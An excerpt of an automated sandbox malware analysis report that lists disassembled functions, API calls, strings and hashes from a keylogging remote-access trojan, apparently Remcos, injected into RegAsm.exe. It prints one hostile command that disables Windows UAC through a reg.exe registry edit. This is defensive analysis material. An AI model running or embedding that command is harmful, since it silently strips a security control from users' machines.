                                  • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                  • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                  • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                  • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                  Function 00442851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: PkGNG
                                  • API String ID: 0-263838557
                                  • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                  • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                  • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                  • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                  Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                  • CloseHandle.KERNEL32(?), ref: 00404DDB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                  • String ID: PkGNG
                                  • API String ID: 3360349984-263838557
                                  • Opcode ID: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                  • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                  • Opcode Fuzzy Hash: 77a6d032992f3495e2e52a01d2ead9a1ebcb79a8041a0f526cc04fc7fe31482d
                                  • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                  Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                  • wsprintfW.USER32 ref: 0040B22E
                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EventLocalTimewsprintf
                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                  • API String ID: 1497725170-248792730
                                  • Opcode ID: 3d679cc2849754fb2f4fa39d800a84baf68540eafbaed469cb563a02f79558db
                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                  • Opcode Fuzzy Hash: 3d679cc2849754fb2f4fa39d800a84baf68540eafbaed469cb563a02f79558db
                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                  Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                  • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSizeSleep
                                  • String ID: XQG
                                  • API String ID: 1958988193-3606453820
                                  • Opcode ID: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                  • Opcode Fuzzy Hash: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                  Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                  • GetLastError.KERNEL32 ref: 0041D611
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ClassCreateErrorLastRegisterWindow
                                  • String ID: 0$MsgWindowClass
                                  • API String ID: 2877667751-2410386613
                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                  Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                  Strings
                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreateProcess
                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                  • API String ID: 2922976086-4183131282
                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                  Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                  Download Yara Rule
                                  Strings
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                  • SG, xrefs: 00407715
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  • API String ID: 0-643455097
                                  • Opcode ID: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                  • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                  • Opcode Fuzzy Hash: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                  • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                  Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                  • SetEvent.KERNEL32(?), ref: 0040512C
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                  • CloseHandle.KERNEL32(?), ref: 00405140
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                  • String ID: KeepAlive | Disabled
                                  • API String ID: 2993684571-305739064
                                  • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                  • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                  Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                  Strings
                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                  • API String ID: 3024135584-2418719853
                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                  Function 0040140A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetCursorInfo$User32.dll$`#v
                                  • API String ID: 1646373207-1032071883
                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                  Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                  • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                  Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                  • _free.LIBCMT ref: 0044943D
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 00449609
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                  • String ID:
                                  • API String ID: 1286116820-0
                                  • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                  • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                  • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                  • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                  Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 4269425633-0
                                  • Opcode ID: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                  • Opcode Fuzzy Hash: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                  Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                  Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                  • _free.LIBCMT ref: 0044F43F
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                  • String ID:
                                  • API String ID: 2278895681-0
                                  • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                  • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                  Function 0041C482 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreatePointerWrite
                                  • String ID:
                                  • API String ID: 1852769593-0
                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                  Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                  • _free.LIBCMT ref: 00448353
                                  • _free.LIBCMT ref: 0044837A
                                  • SetLastError.KERNEL32(00000000), ref: 00448387
                                  • SetLastError.KERNEL32(00000000), ref: 00448390
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$_free
                                  • String ID:
                                  • API String ID: 3170660625-0
                                  • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                  • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                  Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00450A54
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 00450A66
                                  • _free.LIBCMT ref: 00450A78
                                  • _free.LIBCMT ref: 00450A8A
                                  • _free.LIBCMT ref: 00450A9C
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                  Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00444106
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 00444118
                                  • _free.LIBCMT ref: 0044412B
                                  • _free.LIBCMT ref: 0044413C
                                  • _free.LIBCMT ref: 0044414D
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                  Function 0044BAB7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: PkGNG
                                  • API String ID: 0-263838557
                                  • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                  • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                  • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                  • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                  Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                  Download Yara Rule
                                  APIs
                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                  • _free.LIBCMT ref: 0044E8D5
                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,?,?,?,?,?,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD8C
                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000), ref: 0043BD93
                                  Strings
                                  Memory Dump Source
